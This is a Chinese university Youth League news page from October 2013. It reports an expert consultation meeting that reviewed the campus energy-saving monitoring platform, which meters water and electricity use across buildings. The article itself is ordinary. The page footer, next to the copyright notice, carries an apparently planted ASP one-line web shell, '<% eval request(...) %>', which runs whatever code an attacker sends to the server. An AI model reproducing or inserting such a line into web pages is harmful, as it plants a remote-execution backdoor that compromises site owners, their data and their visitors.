当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
我校召开节约型校园节能监管平台专家咨询(初验收)会
[2013年10月16日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

     10月15日,我校在行政楼706会议室组织召开节约型校园节能监管平台专家咨询会。会议专家组由市教委学校后勤保卫处正处级调研员沈永明及主任科员南少华,同济大学谭洪卫教授,上海市建筑科学院朱伟峰副所长,上海交通大学姚仁忠处长、支琴工程师,上海师范大学黄辞海处长,以及我校后勤管理处、财务与资产处、审计处、现教中心等部门负责人组成。我校封金章副校长出席会议并同与会专家一起参与评审,咨询会由专家组组长谭洪卫教授主持。

     会上,后勤管理处俞渊处长就我校节能监管平台的建设情况作了汇报,详细介绍了我校节能监管平台从组织申报、建设规划、建设方案、建设时间、资金使用情况。施工单位上海建坤信息科技有限公司项目负责人瞿斌汇报了节能监管平台建设施工的具体情况,并现场演示了监管平台的各项系统功能。随后,领导及专家组一行到我校精细化监测的生命学院楼宇的强、弱电间、变电站等功能模块进行了实地考察。

     经过答疑和讨论,专家一致认为我校节能监管平台整个建设过程严谨有序,工作扎实;系统实现了全校建筑能耗的在线监测,内容覆盖了各楼宇水、电的分类和用电的分项计量;系统集成了学校近年实施的节能示范项目、新能源项目的展示,平台系统扩展性好。为学校的能源和资源节约建立了基础和技术支撑,具有较好的示范作用。

     最后,封金章副校长对市教委领导和各高校、机构专家的到来表示感谢,他指出,专家组给我校平台建设提出了很多宝贵的建议,项目组要仔细研究和落实,一方面为迎接国家住建部验收做好准备;另一方面,继续完善平台功能也为学校深入开展节能降耗,能源管理,建设节约型、绿色校园提供技术支撑。相信学校节能监管平台的建设完成,对于推进节约型校园建设,提高管理水平和运行效益具有重要而深远的意义

 

关闭窗口

上一篇:我校龙舟队在“霸王杯”龙舟争霸赛中勇夺霸王杯

下一篇:国家海洋局党组书记、局长刘赐贵一行视察我校
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>